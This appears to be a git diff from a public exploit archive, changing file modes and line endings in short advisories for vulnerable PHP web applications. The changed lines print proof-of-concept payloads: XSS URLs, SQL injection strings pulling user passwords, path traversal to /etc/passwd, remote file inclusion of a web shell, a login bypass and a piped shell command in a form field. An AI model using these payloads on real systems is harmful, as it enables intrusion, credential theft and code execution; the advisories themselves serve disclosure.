a/platforms/php/webapps/3016.php b/platforms/php/webapps/3016.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30161.txt b/platforms/php/webapps/30161.txt old mode 100755 new mode 100644 index 7422c5b44..7ae56312b --- a/platforms/php/webapps/30161.txt +++ b/platforms/php/webapps/30161.txt @@ -6,4 +6,4 @@ Attackers could exploit these issues to steal cookie-based authentication creden Versions prior to Atom PhotoBlog 1.0.9.1 are vulnerable. -http://www.example.com/atomphotoblog/atomPhotoBlog.php?do=index&tag=<ScRiPt%20%0a%0d>alert(1566213939)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/atomphotoblog/atomPhotoBlog.php?do=index&tag=<ScRiPt%20%0a%0d>alert(1566213939)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/30162.txt b/platforms/php/webapps/30162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30166.txt b/platforms/php/webapps/30166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30168.txt b/platforms/php/webapps/30168.txt old mode 100755 new mode 100644 index 3484be85f..143c4da88 --- a/platforms/php/webapps/30168.txt +++ b/platforms/php/webapps/30168.txt @@ -4,4 +4,4 @@ vBSupport is prone to an SQL-injection vulnerability because it fails to suffici An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. -http://www.example.com/4/vBSupport.php?do=showticket&ticketid=[SQL] \ No newline at end of file +http://www.example.com/4/vBSupport.php?do=showticket&ticketid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/3017.php b/platforms/php/webapps/3017.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30170.txt b/platforms/php/webapps/30170.txt old mode 100755 new mode 100644 index 253506880..39af4d21c --- a/platforms/php/webapps/30170.txt +++ b/platforms/php/webapps/30170.txt @@ -6,4 +6,4 @@ An attacker may leverage any of these issues to execute arbitrary script code in Beehive Forum 0.71 is vulnerable; other versions may also be affected. -http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>".><script>alert(1);</script> http://www.example.com/forum/links.php?webtag=FOEUM_NAME&fid=>".><script>alert(1);</script>&viewmode=1 http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script> \ No newline at end of file +http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>".><script>alert(1);</script> http://www.example.com/forum/links.php?webtag=FOEUM_NAME&fid=>".><script>alert(1);</script>&viewmode=1 http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30171.txt b/platforms/php/webapps/30171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30172.txt b/platforms/php/webapps/30172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30173.txt b/platforms/php/webapps/30173.txt old mode 100755 new mode 100644 index b1fe42d3c..1a986ed51 --- a/platforms/php/webapps/30173.txt +++ b/platforms/php/webapps/30173.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues by manipulating the SQL query logic to carr These issues affect versions prior to JFFNMS 0.8.4-pre3. -http://192.168.1.1/admin/adm/test.php \ No newline at end of file +http://192.168.1.1/admin/adm/test.php \ No newline at end of file diff --git a/platforms/php/webapps/30174.txt b/platforms/php/webapps/30174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30175.txt b/platforms/php/webapps/30175.txt old mode 100755 new mode 100644 index c05ddba2f..1da5709b6 --- a/platforms/php/webapps/30175.txt +++ b/platforms/php/webapps/30175.txt @@ -4,4 +4,4 @@ BBpress is prone to a cross-site scripting vulnerability because it fails to pro Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -GET /bb-login.php?re="><script>alert(1);</script> HTTP/1.0 Host: www.some.site Referer: http://www.some.site/ \ No newline at end of file +GET /bb-login.php?re="><script>alert(1);</script> HTTP/1.0 Host: www.some.site Referer: http://www.some.site/ \ No newline at end of file diff --git a/platforms/php/webapps/30177.txt b/platforms/php/webapps/30177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3018.txt b/platforms/php/webapps/3018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3019.txt b/platforms/php/webapps/3019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30190.txt b/platforms/php/webapps/30190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30197.txt b/platforms/php/webapps/30197.txt old mode 100755 new mode 100644 index d84443473..a2357afc9 --- a/platforms/php/webapps/30197.txt +++ b/platforms/php/webapps/30197.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue affects WSPortal 1.0; other versions may also be vulnerable. -http://www.example.com/[WSPORTAL-DIRECTORY]/content.php?page=0' UNION SELECT `username`,`password` FROM `users` WHERE '1 \ No newline at end of file +http://www.example.com/[WSPORTAL-DIRECTORY]/content.php?page=0' UNION SELECT `username`,`password` FROM `users` WHERE '1 \ No newline at end of file diff --git a/platforms/php/webapps/30200.txt b/platforms/php/webapps/30200.txt old mode 100755 new mode 100644 index af458925a..0d316a5e7 --- a/platforms/php/webapps/30200.txt +++ b/platforms/php/webapps/30200.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script This issue affects Php Hosting Biller 1.0; other versions may also be vulnerable. -http://www.example.com/app_path/index.php/%3E%22%3E%3CScRiPt%3Ealert(1234)%3C/ScRiPt%3E \ No newline at end of file +http://www.example.com/app_path/index.php/%3E%22%3E%3CScRiPt%3Ealert(1234)%3C/ScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/30201.txt b/platforms/php/webapps/30201.txt old mode 100755 new mode 100644 index f9b3f37d3..51012fa17 --- a/platforms/php/webapps/30201.txt +++ b/platforms/php/webapps/30201.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script Fuzzylime 1.01b and prior versions are vulnerable to this issue. -http://www.example.com/path/low.php?action=log&fromforum=111-222-1933email@address.com&fromtopic=111-222-1933email@address.com&fromaction=>"><ScRiPt%20%0a%0d>alert(21 407654)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/path/low.php?action=log&fromforum=111-222-1933email@address.com&fromtopic=111-222-1933email@address.com&fromaction=>"><ScRiPt%20%0a%0d>alert(21 407654)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/30213.txt b/platforms/php/webapps/30213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30217.txt b/platforms/php/webapps/30217.txt old mode 100755 new mode 100644 index 5ccd70884..3902e3aa0 --- a/platforms/php/webapps/30217.txt +++ b/platforms/php/webapps/30217.txt @@ -4,4 +4,4 @@ Wrapper.php for OsCommerce is prone to a local file-include vulnerability becaus Exploiting this issue may allow an unauthorized user to view files and execute local scripts. -http://www.example.com/wrapper.php?file=../../../../etc/passwd \ No newline at end of file +http://www.example.com/wrapper.php?file=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30220.txt b/platforms/php/webapps/30220.txt old mode 100755 new mode 100644 index d38390e47..9272e1bd0 --- a/platforms/php/webapps/30220.txt +++ b/platforms/php/webapps/30220.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l PHP Accounts 0.5 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?page=../../etc/passwd \ No newline at end of file +http://www.example.com/index.php?page=../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30221.txt b/platforms/php/webapps/30221.txt old mode 100755 new mode 100644 index 12a8e677b..3f37ebe99 --- a/platforms/php/webapps/30221.txt +++ b/platforms/php/webapps/30221.txt @@ -11,4 +11,4 @@ http://www.example.com/path/index.php?Outgoing_ID=[SQL INJECTION] http://www.example.com/path/index.php?Project_ID=[SQL INJECTION] http://www.example.com/path/index.php?Client_ID=[SQL INJECTION] http://www.example.com/path/index.php?Invoice_ID=[SQL INJECTION] -http://www.example.com/path/index.php?Vendor_ID=[SQL INJECTION] \ No newline at end of file +http://www.example.com/path/index.php?Vendor_ID=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/30223.txt b/platforms/php/webapps/30223.txt old mode 100755 new mode 100644 index e11d1045d..a58c776d2 --- a/platforms/php/webapps/30223.txt +++ b/platforms/php/webapps/30223.txt @@ -7,4 +7,4 @@ A successful exploit may allow an attacker to steal cookie-based authentication NetClassifieds Free, Standard, Professional, and Premium editions are reported vulnerable. http://www.example.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/* -http://www.example.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/* \ No newline at end of file +http://www.example.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/* \ No newline at end of file diff --git a/platforms/php/webapps/30225.txt b/platforms/php/webapps/30225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30226.txt b/platforms/php/webapps/30226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30227.txt b/platforms/php/webapps/30227.txt old mode 100755 new mode 100644 index 32d5f71c8..c37997d70 --- a/platforms/php/webapps/30227.txt +++ b/platforms/php/webapps/30227.txt @@ -4,4 +4,4 @@ The 'mod_forum' component for Joomla and Mambo is prone to a remote file-include An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to access the underlying system. -http://www.example.com/components/com_forum/download.php?phpbb_root_path=[Shell] \ No newline at end of file +http://www.example.com/components/com_forum/download.php?phpbb_root_path=[Shell] \ No newline at end of file diff --git a/platforms/php/webapps/30230.txt b/platforms/php/webapps/30230.txt old mode 100755 new mode 100644 index 402f02e75..539f410bc --- a/platforms/php/webapps/30230.txt +++ b/platforms/php/webapps/30230.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue affects MyNews 0.10; other versions may also be vulnerable. -To exploit this issue, modify the following cookie variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin" \ No newline at end of file +To exploit this issue, modify the following cookie variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin" \ No newline at end of file diff --git a/platforms/php/webapps/30232.txt b/platforms/php/webapps/30232.txt old mode 100755 new mode 100644 index 740707604..76de63734 --- a/platforms/php/webapps/30232.txt +++ b/platforms/php/webapps/30232.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Calendrix 0.7 is vulnerable; other versions may also be affected. -http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?year=<script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?month="><script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/yearcal.php?ycyear=<script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/cal_footer.inc.php?leftfooter=<script>alert(document.cookies)</script> \ No newline at end of file +http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?year=<script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/calendar.php?month="><script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/yearcal.php?ycyear=<script>alert(document.cookies)</script> http://www.example.com/[PRODUCT-DIRECTORY]/cal_footer.inc.php?leftfooter=<script>alert(document.cookies)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30234.txt b/platforms/php/webapps/30234.txt old mode 100755 new mode 100644 index 0ce233506..0de7215bd --- a/platforms/php/webapps/30234.txt +++ b/platforms/php/webapps/30234.txt @@ -8,4 +8,4 @@ These issues affect Calendarix 0.7.20070307; other versions may also be affected http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 -http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 \ No newline at end of file +http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 \ No newline at end of file diff --git a/platforms/php/webapps/30235.txt b/platforms/php/webapps/30235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30238.txt b/platforms/php/webapps/30238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30246.txt b/platforms/php/webapps/30246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30249.txt b/platforms/php/webapps/30249.txt old mode 100755 new mode 100644 index d3a40e577..3db679b05 --- a/platforms/php/webapps/30249.txt +++ b/platforms/php/webapps/30249.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain access to administration plugins. Thi This issue affects Papoo 3.6; prior versions may also be affected. -http://www.example.com/interna/plugin.php?template=devtools/templates/newdump_backend.html \ No newline at end of file +http://www.example.com/interna/plugin.php?template=devtools/templates/newdump_backend.html \ No newline at end of file diff --git a/platforms/php/webapps/30253.txt b/platforms/php/webapps/30253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30259.txt b/platforms/php/webapps/30259.txt old mode 100755 new mode 100644 index 78897bf09..27df8466c --- a/platforms/php/webapps/30259.txt +++ b/platforms/php/webapps/30259.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to Claroline 1.8.4 are vulnerable. -http://www.example.com/index.php?[XSS] \ No newline at end of file +http://www.example.com/index.php?[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3026.txt b/platforms/php/webapps/3026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30261.txt b/platforms/php/webapps/30261.txt old mode 100755 new mode 100644 index edec42bc4..ee21c7d1c --- a/platforms/php/webapps/30261.txt +++ b/platforms/php/webapps/30261.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script This issue affects Moodle 1.7.1; other versions may also be vulnerable. -http://www.example.com/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20 \ No newline at end of file +http://www.example.com/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20 \ No newline at end of file diff --git a/platforms/php/webapps/30262.txt b/platforms/php/webapps/30262.txt old mode 100755 new mode 100644 index c6d752cfd..009a3bc7c --- a/platforms/php/webapps/30262.txt +++ b/platforms/php/webapps/30262.txt @@ -4,4 +4,4 @@ Liesbeth Base CMS is prone to an information-disclosure vulnerability. Exploiting this issue may allow an attacker to access sensitive information that may aid in further attacks. -http://www.example.com/config.inc \ No newline at end of file +http://www.example.com/config.inc \ No newline at end of file diff --git a/platforms/php/webapps/3027.txt b/platforms/php/webapps/3027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30277.txt b/platforms/php/webapps/30277.txt old mode 100755 new mode 100644 index 550c9eb35..4332468bc --- a/platforms/php/webapps/30277.txt +++ b/platforms/php/webapps/30277.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an unauthorized user to view files and execute These issues affects Maia Mailguard 1.0.2 and prior versions. -http://www.example.com/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt \ No newline at end of file +http://www.example.com/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt \ No newline at end of file diff --git a/platforms/php/webapps/3028.txt b/platforms/php/webapps/3028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30283.txt b/platforms/php/webapps/30283.txt old mode 100755 new mode 100644 index 20eb312e5..28127f08f --- a/platforms/php/webapps/30283.txt +++ b/platforms/php/webapps/30283.txt @@ -18,4 +18,4 @@ Cookie: Authentication Data for SquirrelMail Content-Type: application/x-www-form-urlencoded Content-Length: 140 -id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 \ No newline at end of file +id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 \ No newline at end of file diff --git a/platforms/php/webapps/3029.php b/platforms/php/webapps/3029.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30290.txt b/platforms/php/webapps/30290.txt old mode 100755 new mode 100644 index 7c28b3a1d..524453157 --- a/platforms/php/webapps/30290.txt +++ b/platforms/php/webapps/30290.txt @@ -16,4 +16,4 @@ The following proof-of-concept URIs are available: http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php -https://www.example.com/main.php?page=https://www.example2.com \ No newline at end of file +https://www.example.com/main.php?page=https://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/30293.txt b/platforms/php/webapps/30293.txt old mode 100755 new mode 100644 index 3774fe05e..f0d5b5f1b --- a/platforms/php/webapps/30293.txt +++ b/platforms/php/webapps/30293.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Helma 1.5.3 is vulnerable; other versions may also be affected. -http://www.example.com/search/?q=[XSS] \ No newline at end of file +http://www.example.com/search/?q=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30294.txt b/platforms/php/webapps/30294.txt old mode 100755 new mode 100644 index 9b516b826..fdea054f5 --- a/platforms/php/webapps/30294.txt +++ b/platforms/php/webapps/30294.txt @@ -9,4 +9,4 @@ Inmostore 4.0 is vulnerable to this issue. http://www.example.com/admin/index.php Username: admin -Password: 'or''=' \ No newline at end of file +Password: 'or''=' \ No newline at end of file diff --git a/platforms/php/webapps/30299.txt b/platforms/php/webapps/30299.txt old mode 100755 new mode 100644 index fa7095386..95237ed38 --- a/platforms/php/webapps/30299.txt +++ b/platforms/php/webapps/30299.txt @@ -4,4 +4,4 @@ activeWeb contentserver is prone to a client-side input-validation vulnerability An attacker can exploit these input-validation vulnerabilities to perform various attacks (e.g. cross-site scripting, SQL injection, etc.). -http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file +http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/30301.txt b/platforms/php/webapps/30301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30302.txt b/platforms/php/webapps/30302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30303.txt b/platforms/php/webapps/30303.txt old mode 100755 new mode 100644 index dfe9d566a..14f2661f5 --- a/platforms/php/webapps/30303.txt +++ b/platforms/php/webapps/30303.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute an arbitrary remote file contai AzDG Dating Gold 3.0.5 is vulnerable; other versions may also be affected. -http://www.example.com/scriptpath/templates/secure.admin.php?int_path=http://www.example2.com/shell.txt?cmd \ No newline at end of file +http://www.example.com/scriptpath/templates/secure.admin.php?int_path=http://www.example2.com/shell.txt?cmd \ No newline at end of file diff --git a/platforms/php/webapps/30310.txt b/platforms/php/webapps/30310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30312.txt b/platforms/php/webapps/30312.txt old mode 100755 new mode 100644 index 71be88e02..3bac24fa3 --- a/platforms/php/webapps/30312.txt +++ b/platforms/php/webapps/30312.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to execute HTML and script code in Versions prior to WebCit 7.11 are vulnerable. -http://www.example.com/showuser?who=[xss] \ No newline at end of file +http://www.example.com/showuser?who=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30317.txt b/platforms/php/webapps/30317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30318.txt b/platforms/php/webapps/30318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30320.txt b/platforms/php/webapps/30320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30321.txt b/platforms/php/webapps/30321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30323.txt b/platforms/php/webapps/30323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30324.txt b/platforms/php/webapps/30324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3033.txt b/platforms/php/webapps/3033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30333.txt b/platforms/php/webapps/30333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30356.txt b/platforms/php/webapps/30356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30357.txt b/platforms/php/webapps/30357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3036.php b/platforms/php/webapps/3036.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30364.txt b/platforms/php/webapps/30364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30365.txt b/platforms/php/webapps/30365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30366.txt b/platforms/php/webapps/30366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30367.txt b/platforms/php/webapps/30367.txt old mode 100755 new mode 100644 index 1f9a87b33..5ac193ba7 --- a/platforms/php/webapps/30367.txt +++ b/platforms/php/webapps/30367.txt @@ -5,4 +5,4 @@ SMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerab An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. http://www.example.com/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E -http://www.example.com/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit \ No newline at end of file +http://www.example.com/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit \ No newline at end of file diff --git a/platforms/php/webapps/30368.txt b/platforms/php/webapps/30368.txt old mode 100755 new mode 100644 index ccf933131..a15e3eb39 --- a/platforms/php/webapps/30368.txt +++ b/platforms/php/webapps/30368.txt @@ -4,4 +4,4 @@ SMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerab An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/admin/edituser.php?userid=Walltrapas"><script>alert()</script> \ No newline at end of file +http://www.example.com/admin/edituser.php?userid=Walltrapas"><script>alert()</script> \ No newline at end of file diff --git a/platforms/php/webapps/30369.txt b/platforms/php/webapps/30369.txt old mode 100755 new mode 100644 index 06589779d..9de8b8b5c --- a/platforms/php/webapps/30369.txt +++ b/platforms/php/webapps/30369.txt @@ -15,4 +15,4 @@ fully"><script>alert()</script> http://www.example.com/affiliate/merchants/index.php?Act= ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date "><script>alert()</script> -http://www.example.com/affiliate/merchants/index.php?Act= add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script> &modofpay=Authorize.net&bankname=&bankno=& bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid= \ No newline at end of file +http://www.example.com/affiliate/merchants/index.php?Act= add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script> &modofpay=Authorize.net&bankname=&bankno=& bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid= \ No newline at end of file diff --git a/platforms/php/webapps/30370.txt b/platforms/php/webapps/30370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30371.txt b/platforms/php/webapps/30371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30378.txt b/platforms/php/webapps/30378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30379.html b/platforms/php/webapps/30379.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30380.txt b/platforms/php/webapps/30380.txt old mode 100755 new mode 100644 index 16c0e876f..75a86b61e --- a/platforms/php/webapps/30380.txt +++ b/platforms/php/webapps/30380.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow cPanel 10.9.1 is vulnerable to this issue. -http://www.example.com/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password \ No newline at end of file +http://www.example.com/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password \ No newline at end of file diff --git a/platforms/php/webapps/30383.txt b/platforms/php/webapps/30383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30384.txt b/platforms/php/webapps/30384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30385.txt b/platforms/php/webapps/30385.txt old mode 100755 new mode 100644 index 4fffc7187..c2e051b2e --- a/platforms/php/webapps/30385.txt +++ b/platforms/php/webapps/30385.txt @@ -14,4 +14,4 @@ http://www.example.com/viking/post.php?mode=03&t=2[XSS-CODE]"e=2 http://www.example.com/viking/post.php?mode=00&f=1&poll=0[XSS-CODE] -http://www.example.com/viking/post.php?mode=02&p=2[XSS-CODE] \ No newline at end of file +http://www.example.com/viking/post.php?mode=02&p=2[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/30386.txt b/platforms/php/webapps/30386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30387.txt b/platforms/php/webapps/30387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30388.txt b/platforms/php/webapps/30388.txt old mode 100755 new mode 100644 index f708819bc..a26c69e40 --- a/platforms/php/webapps/30388.txt +++ b/platforms/php/webapps/30388.txt @@ -4,4 +4,4 @@ Vikingboard is prone to multiple information-disclosure weaknesses because attac Vikingboard 0.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/viking/cp.php?mode=10&debug=1 \ No newline at end of file +http://www.example.com/viking/cp.php?mode=10&debug=1 \ No newline at end of file diff --git a/platforms/php/webapps/30389.txt b/platforms/php/webapps/30389.txt old mode 100755 new mode 100644 index 3c2553edf..55519596e --- a/platforms/php/webapps/30389.txt +++ b/platforms/php/webapps/30389.txt @@ -8,4 +8,4 @@ This issue affects iFoto 1.0; other versions may also be affected. http://www.example.com/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc http://www.example.com/ifoto/?dir=../../../../../../etc -http://www.example.com/ifoto/index.php?dir=../../../../../../ \ No newline at end of file +http://www.example.com/ifoto/index.php?dir=../../../../../../ \ No newline at end of file diff --git a/platforms/php/webapps/3039.txt b/platforms/php/webapps/3039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30390.txt b/platforms/php/webapps/30390.txt old mode 100755 new mode 100644 index 921e494c8..066857e24 --- a/platforms/php/webapps/30390.txt +++ b/platforms/php/webapps/30390.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Dependent Forums 1.02 is vulnerable; other versions may also be affected. -' union select * from members where member=1 \ No newline at end of file +' union select * from members where member=1 \ No newline at end of file diff --git a/platforms/php/webapps/30391.txt b/platforms/php/webapps/30391.txt old mode 100755 new mode 100644 index 1085b9ee9..b285f3031 --- a/platforms/php/webapps/30391.txt +++ b/platforms/php/webapps/30391.txt @@ -4,4 +4,4 @@ PhpHostBot is prone to a remote file-include vulnerability because it fails to s Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/library/authorize.php?login_form=http://evilcode? \ No newline at end of file +http://www.example.com/library/authorize.php?login_form=http://evilcode? \ No newline at end of file diff --git a/platforms/php/webapps/30396.txt b/platforms/php/webapps/30396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30398.txt b/platforms/php/webapps/30398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30403.txt b/platforms/php/webapps/30403.txt old mode 100755 new mode 100644 index 0521fa547..73f2d8b87 --- a/platforms/php/webapps/30403.txt +++ b/platforms/php/webapps/30403.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to execute HTML and script code in t This issue affects versions prior to WP-FeedStats 2.4. -http://www.example.com/_wp1/?feed=rss2&<script>alert(1)</script> \ No newline at end of file +http://www.example.com/_wp1/?feed=rss2&<script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30405.txt b/platforms/php/webapps/30405.txt old mode 100755 new mode 100644 index e083d3594..b32f5052a --- a/platforms/php/webapps/30405.txt +++ b/platforms/php/webapps/30405.txt @@ -7,4 +7,4 @@ A successful exploit may allow an attacker to steal cookie-based authentication This issue affects Bandersnatch 0.4; other versions may also be affected. http://www.example.com/index.php?date=[SQL] -http://www.example.com/index.php?limit=[SQL] \ No newline at end of file +http://www.example.com/index.php?limit=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/30408.txt b/platforms/php/webapps/30408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30409.txt b/platforms/php/webapps/30409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30429.txt b/platforms/php/webapps/30429.txt old mode 100755 new mode 100644 index 7dad49d74..303c08bcd --- a/platforms/php/webapps/30429.txt +++ b/platforms/php/webapps/30429.txt @@ -8,4 +8,4 @@ The following URI demonstrates this issue: http://www.example.com/path/user.php?REQ=auth&billing=141&status=success&custom=upgrade5 -The '141' and the 'upgrade5' values may vary from installation to installation. \ No newline at end of file +The '141' and the 'upgrade5' values may vary from installation to installation. \ No newline at end of file diff --git a/platforms/php/webapps/3043.txt b/platforms/php/webapps/3043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30433.txt b/platforms/php/webapps/30433.txt old mode 100755 new mode 100644 diff --git 